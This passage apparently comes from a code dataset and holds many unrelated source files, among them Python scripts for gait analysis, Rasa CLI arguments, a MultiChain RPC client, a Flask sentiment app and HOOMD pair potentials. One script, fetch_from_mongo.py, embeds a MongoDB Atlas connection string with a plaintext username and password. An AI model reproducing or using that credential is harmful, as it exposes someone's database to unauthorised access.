sys.stdout.write(\"#\")\n sys.stdout.flush()\n steps =steps+10\n for i_d in range(n):\n difmat[:,i_d] = (np.subtract(state[:,i_d],state[i_t,i_d]))**2\n arridx1 = np.array([1,i_t-np.round(L1)])\n arridx2 = np.array([m,i_t+np.round(L1)])\n idx_start = int(np.round(np.amax(arridx1))-1)\n idx_stop = int(np.round(np.amin(arridx2))-1)\n difmat[idx_start:idx_stop] = difmat[idx_start:idx_stop]*np.nan\n idx_sort = np.sum(difmat,1).argsort()\n for i_nn in range(nnbs):\n div_tmp = np.subtract(state[i_t:i_t+int(win),:],state[idx_sort[i_nn]:(idx_sort[i_nn]+int(win)),:])\n divmat[i_t*nnbs+i_nn,:] = np.sum(div_tmp**2,1)**.5 # track divergence, and store\n sys.stdout.write(\"]\\n\") # end progress bar\n divergence = np.nanmean(np.log(divmat),0)\n xdiv = np.linspace(1,divergence.shape[0],divergence.shape[0])/fs\n xs = xdiv[1:int(np.floor(L1))]\n Ps = np.polynomial.polynomial.polyfit(xs,divergence[1:int(np.floor(L1))],1)\n\n lde = np.ones([1,2])*np.nan\n lde[0] = Ps[1]\n\n L2 = np.round(4*period*fs)\n if L2 < win:\n idxl = (np.linspace(0,win-L2-1,int(win-L2))+int(L2))\n Pl = np.polynomial.Polynomial.fit(idxl/fs,divergence[int(idxl[0]):int(idxl[-1])],1)\n lde[1] = Pl[1]\n return divergence,lde\n\ndef store_result(file_out, value):\n file = open(file_out, 'w')\n file.write('---\\ntype: \\'scalar\\'\\nvalue: ' + format(round(value,2), '.5f')+'\\n')\n file.close()\n return True\n\nUSAGE = \"\"\"usage: run_pi file_in_comTrajectories file_in_events folder_out\n>> file_in_comTrajectories: csv file containing the positonal CoM data\n>> file_in_events: csv file containing the timing of gait events\n>> folder_out: folder where the PI yaml files will be stored\n\"\"\"\n\ndef main():\n if len(sys.argv) != 4:\n print(colored(\"Wrong input parameters !\", \"red\"))\n print(colored(USAGE, \"yellow\"))\n return -1\n\n file_in_com = sys.argv[1]\n file_in_events = sys.argv[2]\n folder_out = sys.argv[3]\n\n\n # check input parameters are good\n if not os.path.exists(file_in_com):\n print(colored(\"Input file {} does not exist\".format(file_in_com), \"red\"))\n return -1\n if not os.path.isfile(file_in_com):\n print(colored(\"Input path {} is not a file\".format(file_in_com), \"red\"))\n return -1\n if not os.path.exists(file_in_events):\n print(colored(\"Input file {} does not exist\".format(file_in_events), \"red\"))\n return -1\n if not os.path.isfile(file_in_events):\n print(colored(\"Input path {} is not a file\".format(file_in_events), \"red\"))\n return -1\n\n if not os.path.exists(folder_out):\n print(colored(\n \"Output folder {} does not exist\".format(folder_out),\n \"red\"))\n return -1\n if not os.path.isfile(file_in_com):\n print(colored(\"Output path {} is not a folder\".format(file_in_com), \"red\"))\n return -1\n if not os.path.isfile(file_in_events):\n print(colored(\"Output path {} is not a folder\".format(file_in_com), \"red\"))\n return -1\n\n # load joint data\n com = pd.read_csv(file_in_com)\n # load events structure\n events = read_events(file_in_events)\n # from com data calculate the sampling frequency\n fs = 1/np.mean(np.diff(np.array(com.time)))\n # calculate the spatiotemporal parameters\n ws= 8\n period = 2.04\n nnbs = 4\n ndim = 5\n delay = 10\n state = calcStateSpace(com.y,events,fs,ndim,delay)\n diverg,locdiv = calcLDE(state,ws,fs,period,nnbs)\n print(locdiv[0][0])\n file_out0 = folder_out + \"/pi_LDE.yaml\"\n if not store_result(file_out0, locdiv[0][0]):\n return -1\n print(colored(\n \"local divergence exp.: {} stored in {}\".format(round(locdiv[0][0],2), file_out0),\n \"green\"))\n return 0\n\n\n\n\n\n","repo_name":"nickkluft/udbenchmark_PIs","sub_path":"src/pi_LDE/pi_LDE/localdivergence.py","file_name":"localdivergence.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"34341531228","text":"import argparse\nfrom typing import Text\n\nfrom rasa.cli.arguments.default_arguments import (\n add_nlu_data_param,\n add_out_param,\n add_data_param,\n add_domain_param,\n)\nfrom rasa.shared.constants import DEFAULT_CONVERTED_DATA_PATH\n\n\ndef set_convert_arguments(parser: argparse.ArgumentParser, data_type: Text) -> None:\n \"\"\"Sets convert command arguments.\"\"\"\n parser.add_argument(\n \"-f\",\n \"--format\",\n default=\"yaml\",\n choices=[\"json\", \"yaml\"],\n help=\"Output format the training data should be converted into.\",\n )\n\n add_data_param(parser, required=True, data_type=data_type)\n\n add_out_param(\n parser,\n default=DEFAULT_CONVERTED_DATA_PATH,\n help_text=\"File (for `json`) or existing path (for `yaml`) \"\n \"where to save training data in Rasa format.\",\n )\n\n parser.add_argument(\"-l\", \"--language\", default=\"en\", help=\"Language of data.\")\n\n\ndef set_split_arguments(parser: argparse.ArgumentParser) -> None:\n add_nlu_data_param(parser, help_text=\"File or folder containing your NLU data.\")\n\n parser.add_argument(\n \"--training-fraction\",\n type=float,\n default=0.8,\n help=\"Percentage of the data which should be in the training data.\",\n )\n\n parser.add_argument(\n \"--random-seed\",\n type=int,\n default=None,\n help=\"Seed to generate the same train/test split.\",\n )\n\n add_out_param(\n parser,\n default=\"train_test_split\",\n help_text=\"Directory where the split files should be stored.\",\n )\n\n\ndef set_validator_arguments(parser: argparse.ArgumentParser) -> None:\n parser.add_argument(\n \"--fail-on-warnings\",\n default=False,\n action=\"store_true\",\n help=\"Fail validation on warnings and errors. \"\n \"If omitted only errors will result in a non zero exit code.\",\n )\n add_domain_param(parser)\n add_data_param(parser)\n\n\ndef set_migrate_arguments(parser: argparse.ArgumentParser) -> None:\n \"\"\"Sets migrate command arguments.\"\"\"\n add_domain_param(parser)\n\n add_out_param(\n parser,\n default=None,\n help_text=\"Path (for `yaml`) where to save migrated domain in Rasa 3.0 format.\"\n \"If none is specified, either a `new_domain.yml` file or `new_domain` folder \"\n \"will be created in the folder that contains the given domain.\",\n )\n","repo_name":"RasaHQ/rasa","sub_path":"rasa/cli/arguments/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":2388,"program_lang":"python","lang":"en","doc_type":"code","stars":17244,"dataset":"github-code","pt":"5"} +{"seq_id":"32133831986","text":"# python script to fetch data from the remote DB (MongoDB hosted on MongoDb Atlas) with query\n\nimport pymongo\n\nclient = pymongo.MongoClient(\"mongodb+srv://gatij:9nncz40BasoM5mmu@democluster.3tqjv.azure.mongodb.net/?retryWrites=true&w=majority\")\nmydb = client[\"BookstoreDb\"]\nmycol = mydb[\"Books\"]\nmyquery = {\"Category\" : \"Computers\"}\nmydoc = mycol.find(myquery)\nfor x in mydoc:\n\tprint(x)","repo_name":"gatij/handyScripts","sub_path":"fetch_from_mongo.py","file_name":"fetch_from_mongo.py","file_ext":"py","file_size_in_byte":399,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36266594755","text":"\nfrom urllib import request\nfrom urllib import error\nimport base64\nimport json\nfrom collections import OrderedDict\nimport time\nimport ssl\n\ndefault_error_code = 502\n\nclass MultiChainClient:\n\n def __init__(self, host, port, username, password, usessl = False):\n self.host = host\n self.port = port\n self.username = username\n self.password = password\n self.usessl = usessl\n\n self.chainname = None\n self.verifyssl = True\n\n self.error_code = 0\n self.error_message = \"\"\n\n def setoption(self, option, value):\n\n if(option == \"chainname\"):\n self.chainname = value\n if(option == \"verifyssl\"):\n self.verifyssl = value\n\n def api_wrapper(self, method):\n\n def api_caller(*args):\n\n url=\"https\" if self.usessl else \"http\"\n\n url += \"://\" + self.host + \":\" + str(self.port)\n userpass64 = base64.b64encode((self.username + \":\" + self.password).encode(\"ascii\")).decode(\"ascii\")\n\n headers={\n \"Content-Type\" : \"application/json\",\n \"Connection\" : \"close\",\n \"Authorization\" : \"Basic \" + userpass64\n }\n\n api_request={\n \"id\" : int(round(time.time() * 1000)),\n \"method\" : method,\n \"params\" : args\n }\n\n if self.chainname:\n api_request[\"chain_name\"] = self.chainname\n\n payload=json.dumps(api_request)\n\n headers[\"Content-Length\"] = str(len(payload))\n\n try:\n data = str(payload)\n data = data.encode('utf-8')\n\n ureq = request.Request(url, data=data)\n\n for header,value in headers.items():\n ureq.add_header(header, value)\n\n if self.verifyssl:\n req = request.urlopen(ureq)\n else:\n context = ssl._create_unverified_context()\n req = request.urlopen(ureq, context=context)\n\n except error.HTTPError as e:\n\n self.error_code = e.getcode()\n self.error_message = e.reason\n\n resp = e.read()\n\n if resp:\n req_json=json.loads(resp.decode('utf-8'))\n if req_json['error'] is not None:\n self.error_code = req_json['error']['code']\n self.error_message = req_json['error']['message']\n if self.error_code == -1:\n if self.error_message.find(\"\\n\\n\") >= 0:\n self.error_message = \"Wrong parameters. Usage:\\n\\n\" + self.error_message\n\n return None\n\n except error.URLError as e:\n\n self.error_code = default_error_code\n self.error_message = str(e.reason)\n\n return None\n\n resp=req.read()\n req_json=json.loads(resp.decode('utf-8'), object_pairs_hook=OrderedDict)\n\n return req_json['result']\n\n return api_caller\n\n def __getattr__(self, method):\n return self.api_wrapper(method)\n\n def errorcode(self):\n return self.error_code\n\n def errormessage(self):\n return self.error_message\n\n def success(self):\n return (self.error_code == 0)","repo_name":"Syed007Hassan/Fast-Material-CS-SE","sub_path":"6TH SEMESTER/Blockchain and Cryptocurrency/Labs/Lab5/multichain.py","file_name":"multichain.py","file_ext":"py","file_size_in_byte":3359,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"5"} +{"seq_id":"11039602499","text":"from setuptools import setup, find_packages\n\nwith open('README.md') as fhandle:\n long_description = fhandle.read()\n\n\nsetup(\n name='pyansible',\n version='1.0.3',\n description='A module for interfacing with Ansible Runner and Inventory.',\n long_description=long_description,\n url=\"https://github.com/bdastur/spam\",\n author=\"Behzad Dastur\",\n author_email=\"bdastur@gmail.com\",\n license='Apache Software License',\n classifier=[\n 'Development Status :: 3 - Alpha',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 2.6',\n 'Programming Language :: Python :: 2.7',\n 'Intended Audience :: Developers',\n 'License :: Apache Software License',\n 'Topic :: Software Development :: Libraries',\n 'Topic :: Utilities',\n 'License :: OSI Approved :: Apache Software License',\n 'Operating System :: POSIX :: Linux',\n 'Operating System :: MacOS',\n ],\n\n keywords='ansible',\n packages=find_packages(exclude=['contrib', 'docs', 'tests']),\n install_requires=['rexutil',\n 'MarkupSafe',\n 'jinja2',\n 'PyYAML',\n 'ansible==1.9.4']\n)\n\n","repo_name":"bdastur/spam","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1233,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"5"} +{"seq_id":"22564695086","text":"from os import path, pardir\nfrom ecosystem_tests.dorkl import replace_plugin_package_on_manager\nfrom ecosystem_cicd_tools.validations import validate_plugin_version\n\nabs_path = path.join(\n path.abspath(path.join(path.dirname(__file__), pardir)))\n\nif __name__ == '__main__':\n version = validate_plugin_version(abs_path)\n for package in ['cloudify_vcd', 'vcd_plugin_sdk']:\n replace_plugin_package_on_manager(\n 'cloudify-vcloud-plugin', version, package, )\n","repo_name":"cloudify-cosmo/cloudify-vcloud-plugin","sub_path":".circleci/update_test_manager.py","file_name":"update_test_manager.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"30378179279","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('network_site', '0005_auto_20150526_1321'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='NetworkProt',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n ('port_name', models.CharField(max_length=10)),\n ('port_status', models.IntegerField(choices=[(1, 'trunk'), (2, 'access')])),\n ('device', models.ForeignKey(to='network_site.NetworkEquipment')),\n ('to_where', models.ForeignKey(to='network_site.Host')),\n ],\n ),\n migrations.CreateModel(\n name='Vlans',\n fields=[\n ('id', models.AutoField(serialize=False, verbose_name='ID', primary_key=True, auto_created=True)),\n ('vlan_id', models.PositiveSmallIntegerField(unique=True)),\n ('name', models.CharField(max_length=32)),\n ('desctiption', models.TextField()),\n ],\n ),\n migrations.AddField(\n model_name='networkprot',\n name='vlans',\n field=models.ManyToManyField(to='network_site.Vlans'),\n ),\n migrations.AlterUniqueTogether(\n name='networkprot',\n unique_together=set([('device', 'port_name')]),\n ),\n ]\n","repo_name":"HackBulgariaHackathon/Hackathon","sub_path":"pysuppl/network_site/migrations/0006_auto_20150526_1347.py","file_name":"0006_auto_20150526_1347.py","file_ext":"py","file_size_in_byte":1515,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"16915910099","text":"from flask import Flask, jsonify, render_template, request\n\nfrom stanfordcorenlp import StanfordCoreNLP\nimport utils.wordpiece as wp\nfrom utils.vocab import Vocab\nimport nltk\nfrom nltk.sentiment import SentimentIntensityAnalyzer\npath = 'H:/a/nlp/stanford-corenlp-full-2018-10-05'\nnlp = StanfordCoreNLP(path, lang='en')\napp = Flask(__name__)\n# nltk.download('vader_lexicon') # 下载情感词典\n\n# 路由解析:通过用户访问的路径,匹配相应函数\n@app.route('/')\ndef index():\n return render_template(\"index.html\")\n\n\n# 返回首页\n@app.route('/index')\ndef home():\n return render_template(\"index.html\")\n\n\n# 返回电影页面\n@app.route('/movie')\ndef movie():\n sentence=request.args[\"sentence\"]\n label=request.args[\"label\"]\n print(sentence,label)\n nullPage=[]\n if sentence=='null':\n return render_template(\"movie.html\", movies=nullPage)\n l_dict=[]\n lc='1\\tit is a beautiful nice day'\n l_dict.append(lc)\n judges = ''\n triples = ''\n op_dict = {}\n vocab = Vocab()\n vocab.load('utils/google_uncased_en_vocab.txt')\n count_wp = 0\n op_skip_list = []\n ent_skip_list = []\n\n for i in range(0, len(l_dict)):\n # for i in range(1, 3):\n\n s_label, s_content = label,sentence\n if s_label == '0':\n judges = 'bad'\n if s_label == '1':\n judges = 'good'\n token = nlp.word_tokenize(s_content)\n if i % 500 == 0:\n print(i+1, ' examples, ', len(l_dict) - i, 'to go')\n dependencyParse = nlp.dependency_parse(s_content)\n pos = nlp.pos_tag(s_content)\n # a1=nlp.pos_tag('apple')[0][1]\n wptoken = wp.WordpieceTokenizer(vocab.i2w)\n for i, begin, end in dependencyParse:\n # print (i, '-'.join([str(begin), token[begin-1]]), '-'.join([str(end),token[end-1]]))\n if i == 'amod' or i == 'nsubj':\n if nlp.pos_tag(token[begin - 1])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS','JJ', 'JJR', 'JJS'] and \\\n nlp.pos_tag(token[end - 1])[0][1] in ['JJ', 'JJR', 'JJS','NN', 'NNS', 'NNP', 'NNPS']:\n if nlp.pos_tag(token[begin - 1])[0][1] in ['JJ', 'JJR', 'JJS'] and nlp.pos_tag(token[end - 1])[0][1] in ['NN', 'NNS', 'NNP', 'NNPS']:\n entity1 = token[end - 1]\n op = token[begin - 1]\n else:\n entity1 = token[begin - 1]\n op = token[end - 1]\n entity2 = wptoken.tokenize(entity1)[0]\n entity2 = entity2.strip()\n if op.lower() in ['true', 'right']:\n judges = 'good'\n if op.lower() in ['false', 'wrong']:\n judges = 'bad'\n if len(entity2) > 1:\n count_wp += 1\n\n if entity2 + '\\t' + op not in op_dict.keys():\n good_num, bad_num = 0, 0\n if judges == 'good':\n good_num = 1\n else:\n bad_num = 1\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + '1' + '\\t' + '0' + '\\t' + str(\n good_num) + '\\t' + str(\n bad_num)\n\n else:\n ac_judges, count_tr, conf, good_num, bad_num = op_dict[entity2 + '\\t' + op].split('\\t')\n count_tr = int(count_tr) + 1\n if judges == 'good':\n good_num = int(good_num) + 1\n if judges == 'bad':\n bad_num = int(bad_num) + 1\n # 判断是否有冲突\n if conf == '1' or judges != ac_judges:\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + str(count_tr) + '\\t' + '1' + '\\t' + str(\n good_num) + '\\t' + str(bad_num)\n else:\n op_dict[entity2 + '\\t' + op] = judges + '\\t' + str(count_tr) + '\\t' + '0' + '\\t' + str(\n good_num) + '\\t' + str(bad_num)\n # 遍历op_dict,放入到list中去\n messages = []\n for key in op_dict.keys():\n message=[]\n k1,k2=key.split('\\t')\n message.append(k1)\n message.append(k2)\n v1,v2,v3,v4,v5=op_dict[key].split('\\t')\n if v1=='good':\n v1='positive'\n if v1=='bad':\n v1='negative'\n message.append(v1)\n v2=v2+' time(s)'\n if v3=='0':\n v3='no conflicts'\n if v3=='1':\n v3='conflicted knowledge'\n v4=v4+' vote(s)'\n v5=v5+' vote(s)'\n message.append(v2)\n message.append(v3)\n message.append(v4)\n message.append(v5)\n messages.append(message)\n # datalist = []\n # con = sqlite3.connect(\"moveTop.db\") # 打开数据库\n # cur = con.cursor() # 获取游标\n # sql = \"select * from movieTop250\" # sql查询语句\n # data = cur.execute(sql) # 获取数据\n # for item in data: # 将数据保存在列表中\n # datalist.append(item)\n # cur.close() # 关闭游标\n # con.close() # 关闭连接\n return render_template(\"movie.html\", movies=messages)\n\n# 返回评分界面\n@app.route('/score')\ndef score():\n messages=[]\n with open(r'./kgs/movie.spo','r',encoding='utf-8') as f:\n lines = f.readlines()\n for line in lines:\n i1,i2,i3,i4,i5,i6,i7,i8=line.split('\\t')\n if i3 == 'good':\n i3 = 'positive'\n if i3 == 'bad':\n i3 = 'negative'\n i4 = i4 + ' time(s)'\n if i5 == '0':\n i5 = 'no conflicts'\n if i5 == '1':\n i5 = 'conflicted knowledge'\n i6 = i6 + ' vote(s)'\n i7 = i7 + ' vote(s)'\n if i8[0]!='-':\n i8=i8[0:3]\n else:\n i8=i8[0:4]\n message=[]\n message.append(i1)\n message.append(i2)\n message.append(i3)\n message.append(i4)\n message.append(i5)\n message.append(i6)\n message.append(i7)\n message.append(i8)\n messages.append(message)\n return render_template(\"score.html\",movies=messages)\n\n\n@app.route('/word')\ndef word():\n return render_template(\"word.html\")\n\n\n# 返回词云界面\n@app.route('/wordsdeal', methods=['POST'])\ndef words_deal():\n input_text = request.form['input_text']\n score = get_sentiment(input_text)\n pol = ''\n if score>=0:\n pol = pol + 'positive'\n else:\n pol = pol + 'negative'\n final_str = \"该句子的情感极性为:\"+pol+\" ,句子情感得分为:\"+str(score)\n return jsonify({'processed_text': final_str})\n\ndef get_sentiment(text):\n sia = SentimentIntensityAnalyzer()\n sentiment_score = sia.polarity_scores(text)\n sentiment_polarity = sentiment_score['compound']\n return sentiment_polarity\n\n\n# 返回团队界面\n@app.route('/team')\ndef team():\n return render_template(\"team.html\")\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AlanLinZhizhou/analyzeText","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"35160813578","text":"# 56ms 50.37%\n# 13.1MB 72.31%\nclass Solution:\n\n def longestValidParentheses(self, s: str) -> int:\n\n dp = []\n ans = 0\n for i in range(len(s)):\n if i == 0:\n dp.append(0)\n continue\n if s[i] == '(':\n dp.append(0)\n else:\n if s[i-1] == '(':\n dp.append(dp[i-2]+2)\n elif i-dp[i-1]-1 >= 0 and s[i-dp[i-1]-1] == '(':\n dp.append(dp[i-1]+dp[max(i-dp[i-1]-2, 0)]+2)\n else:\n dp.append(0)\n if dp[-1] > ans:\n ans = dp[-1]\n return ans\n\nst = '()(())'\na = Solution()\nprint(a.longestValidParentheses(st))","repo_name":"hjf1997/Leetcode","sub_path":"String/longest-valid-parentheses.py","file_name":"longest-valid-parentheses.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"12745969127","text":"import unittest\nfrom Autodiff.computation_graph import *\n\n\nclass GraphTest(unittest.TestCase):\n\n def setUp(self) -> None:\n v5 = Node(op=Minus())\n v4 = Node(op=Plus())\n v3 = Node(op=Sin())\n v2 = Node(op=Product())\n v1 = Node(op=Log())\n v0 = Node(op=Assignment(52))\n v_1 = Node(op=Assignment(21.3))\n\n v5.add_input(v4)\n v5.add_input(v3)\n\n v4.add_input(v1)\n v4.add_input(v2)\n\n v3.add_input(v0)\n\n v2.add_input(v_1)\n v2.add_input(v0)\n\n v1.add_input(v_1)\n self.nodes = [v_1, v0, v1, v2, v3, v4, v5]\n\n def test_evaluation(self):\n graph = Graph()\n graph.execute(self.nodes[-1])\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n\n def test_gradient(self):\n graph = Graph()\n # derivation with respect to v_1\n graph.forward_gradient(self.nodes[-1], self.nodes[0])\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.grad1 = lambda x1, x2: 1 / x1 + x2\n\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n self.assertAlmostEqual(self.nodes[-1].grad, self.grad1(*inputs))\n\n # derivation with respect to v0\n graph.forward_gradient(self.nodes[-1], self.nodes[1])\n self.grad2 = lambda x1, x2: x1 - np.cos(x2)\n self.assertAlmostEqual(self.nodes[-1].value, self.ref_func(*inputs))\n self.assertAlmostEqual(self.nodes[-1].grad, self.grad2(*inputs))\n\n def test_reverse_gradient(self):\n # reverse mode\n graph = Graph()\n graph.reverse_gradient(self.nodes[-1])\n\n inputs = [self.nodes[0].value, self.nodes[1].value]\n\n self.ref_func = lambda x1, x2: np.log(x1) + x1 * x2 - np.sin(x2)\n self.grad1 = lambda x1, x2: 1 / x1 + x2\n self.assertAlmostEqual(self.nodes[0].adjoint, self.grad1(*inputs))\n\n # derivation with respect to v0\n\n self.grad2 = lambda x1, x2: x1 - np.cos(x2)\n self.assertAlmostEqual(self.nodes[1].adjoint, self.grad2(*inputs))\n","repo_name":"maxime-z/basic_sc","sub_path":"Autodiff/test_graph.py","file_name":"test_graph.py","file_ext":"py","file_size_in_byte":2266,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"27341513600","text":"import boto3\nimport requests\nfrom datetime import datetime, timezone\nimport structlog\n\nMAX_IDLE_SIZE = 30 # in minutes\n\nstructlog.configure(\n processors=[\n structlog.processors.JSONRenderer(sort_keys=True),\n structlog.stdlib.add_log_level,\n structlog.stdlib.PositionalArgumentsFormatter(),\n structlog.processors.TimeStamper(fmt='iso'),\n ],\n logger_factory=structlog.stdlib.LoggerFactory(),\n wrapper_class=structlog.stdlib.BoundLogger,\n context_class=structlog.threadlocal.wrap_dict(dict),\n)\n\n\ndef lambda_handler(event, context):\n\n log = structlog.get_logger()\n\n sagemaker = boto3.client('sagemaker')\n notebooks = sagemaker.list_notebook_instances(\n StatusEquals='InService')['NotebookInstances']\n\n for notebook in notebooks:\n\n response = sagemaker.create_presigned_notebook_instance_url(\n NotebookInstanceName=notebook['NotebookInstanceName'],\n SessionExpirationDurationInSeconds=600\n )\n url = response['AuthorizedUrl']\n\n response = requests.get(f'{url}/api/kernels')\n\n # check if any of the kernels have been active recently\n for kernel in response.json():\n\n if kernel['execution_state'] == 'busy':\n continue\n\n last_activity_time_str = kernel['last_activity']\n last_activity_time = datetime.strptime(\n last_activity_time_str, '%Y-%m-%dT%H:%M:%S.%fZ').replace(tzinfo=timezone.utc)\n current_time = datetime.now(timezone.utc)\n time_elapsed = (\n current_time - last_activity_time).total_seconds() // 60 # in minutes\n\n if time_elapsed > MAX_IDLE_SIZE:\n sagemaker.stop_notebook_instance(\n NotebookInstanceName=notebook['NotebookInstanceName'])\n log.warning(\n 'Stopped SageMaker notebook instance due to inactivity',\n instance_name=notebook['NotebookInstanceName'],\n kernel_id=kernel['id'],\n last_activity_time=last_activity_time_str,\n time_elapsed_minutes=time_elapsed,\n )\n break\n else:\n log.info(\n 'SageMaker notebook instance is still active',\n instance_name=notebook['NotebookInstanceName'],\n )\n","repo_name":"vanbrands/sagemaker_auto_sleep","sub_path":"src/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":2365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"38659726164","text":"# found thes solution using the last number here... https://oeis.org/A006877,\n# to improve, I would store the sequence length for each number and use that if the program ever encountered it again\n\ndef func(n):\n if n & 1 == 0:\n n = n/2\n else:\n n = 3*n + 1\n return n\n\n\ni_max = 0\nfor n in range(150, 200):\n i = 0\n while n != 1:\n n = func(n)\n i = i + 1\n if i > i_max:\n i_max = i\n\nprint(i_max)\n","repo_name":"acjensen/project-euler","sub_path":"0014_LongestCollatzSequence.py","file_name":"0014_LongestCollatzSequence.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29680242641","text":"r\"\"\"Anisotropic pair forces.\n\nAnisotropic pair force classes apply a force, torque, and virial on every\nparticle in the simulation state commensurate with the potential energy:\n\n.. math::\n\n U_\\mathrm{pair,total} = \\frac{1}{2} \\sum_{i=0}^\\mathrm{N_particles-1}\n \\sum_{j \\ne i, (i,j) \\notin \\mathrm{exclusions}}\n U_\\mathrm{pair}(r_{ij}, \\mathbf{q}_i, \\mathbf{q}_j)\n\n`AnisotropicPair` applies cuttoffs, exclusions, and assigns per particle\nenergies and virials in the same manner as `hoomd.md.pair.Pair`\n\n`AnisotropicPair` does not support the ``'xplor'`` shifting mode or the ``r_on``\nparameter.\n\"\"\"\n\nfrom collections.abc import Sequence\nimport json\nfrom numbers import Number\n\nfrom hoomd.md.pair.pair import Pair\nfrom hoomd.logging import log\nfrom hoomd.data.parameterdicts import TypeParameterDict\nfrom hoomd.data.typeparam import TypeParameter\nfrom hoomd.data.typeconverter import OnlyIf, to_type_converter\n\n\nclass AnisotropicPair(Pair):\n r\"\"\"Base class anisotropic pair force.\n\n `AnisotropicPair` is the base class for all anisotropic pair forces.\n\n Warning:\n This class should not be instantiated by users. The class can be used\n for `isinstance` or `issubclass` checks.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList) : The neighbor list.\n default_r_cut (`float`, optional) : The default cutoff for the\n potential, defaults to ``None`` which means no cutoff\n :math:`[\\mathrm{length}]`.\n mode (`str`, optional) : the energy shifting mode, defaults to \"none\".\n \"\"\"\n\n _accepted_modes = (\"none\", \"shift\")\n\n def __init__(self, nlist, default_r_cut=None, mode=\"none\"):\n super().__init__(nlist, default_r_cut, 0.0, mode)\n\n def _return_type_shapes(self):\n type_shapes = self._cpp_obj.getTypeShapesPy()\n ret = [json.loads(json_string) for json_string in type_shapes]\n return ret\n\n\nclass Dipole(AnisotropicPair):\n r\"\"\"Screened dipole-dipole pair forces.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius :math:`[\\mathrm{length}]`.\n\n `Dipole` computes the (screened) interaction between pairs of\n particles with dipoles and electrostatic charges:\n\n .. math::\n\n U &= U_{dd} + U_{de} + U_{ee}\n\n U_{dd} &= A e^{-\\kappa r}\n \\left(\\frac{\\vec{\\mu_i}\\cdot\\vec{\\mu_j}}{r^3}\n - 3\\frac{(\\vec{\\mu_i}\\cdot \\vec{r_{ji}})\n (\\vec{\\mu_j}\\cdot \\vec{r_{ji}})}\n {r^5}\n \\right)\n\n U_{de} &= A e^{-\\kappa r}\n \\left(\\frac{(\\vec{\\mu_j}\\cdot \\vec{r_{ji}})q_i}{r^3}\n - \\frac{(\\vec{\\mu_i}\\cdot \\vec{r_{ji}})q_j}{r^3}\n \\right)\n\n U_{ee} &= A e^{-\\kappa r} \\frac{q_i q_j}{r}\n\n Note:\n All units are documented electronic dipole moments. However, `Dipole`\n can also be used to represent magnetic dipoles.\n\n Example::\n\n nl = nlist.Cell()\n dipole = md.pair.ansio.Dipole(nl, default_r_cut=3.0)\n dipole.params[('A', 'B')] = dict(A=1.0, kappa=4.0)\n dipole.mu['A'] = (4.0, 1.0, 0.0)\n\n .. py:attribute:: params\n\n The dipole potential parameters. The dictionary has the following\n keys:\n\n * ``A`` (`float`, **required**) - :math:`A` - electrostatic energy\n scale (*default*: 1.0)\n :math:`[\\mathrm{energy} \\cdot \\mathrm{length} \\cdot\n \\mathrm{charge}^{-2}]`\n * ``kappa`` (`float`, **required**) - :math:`\\kappa` - inverse\n screening length :math:`[\\mathrm{length}^{-1}]`\n\n Type: `TypeParameter` [`tuple` [``particle_type``, ``particle_type``],\n `dict`]\n\n .. py:attribute:: mu\n\n :math:`\\mu` - the magnetic magnitude of the particle local reference\n frame as a tuple (i.e. :math:`(\\mu_x, \\mu_y, \\mu_z)`)\n :math:`[\\mathrm{charge} \\cdot \\mathrm{length}]`.\n\n Type: `TypeParameter` [``particle_type``, `tuple` [`float`, `float`,\n `float` ]]\n \"\"\"\n _cpp_class_name = \"AnisoPotentialPairDipole\"\n\n def __init__(self, nlist, default_r_cut=None):\n super().__init__(nlist, default_r_cut, 'none')\n params = TypeParameter(\n 'params', 'particle_types',\n TypeParameterDict(A=float, kappa=float, len_keys=2))\n mu = TypeParameter('mu', 'particle_types',\n TypeParameterDict((float, float, float), len_keys=1))\n self._extend_typeparam((params, mu))\n\n\nclass GayBerne(AnisotropicPair):\n r\"\"\"Gay-Berne anisotropic pair force.\n\n Args:\n nlist (hoomd.md.nlist.NeighborList): Neighbor list\n default_r_cut (float): Default cutoff radius 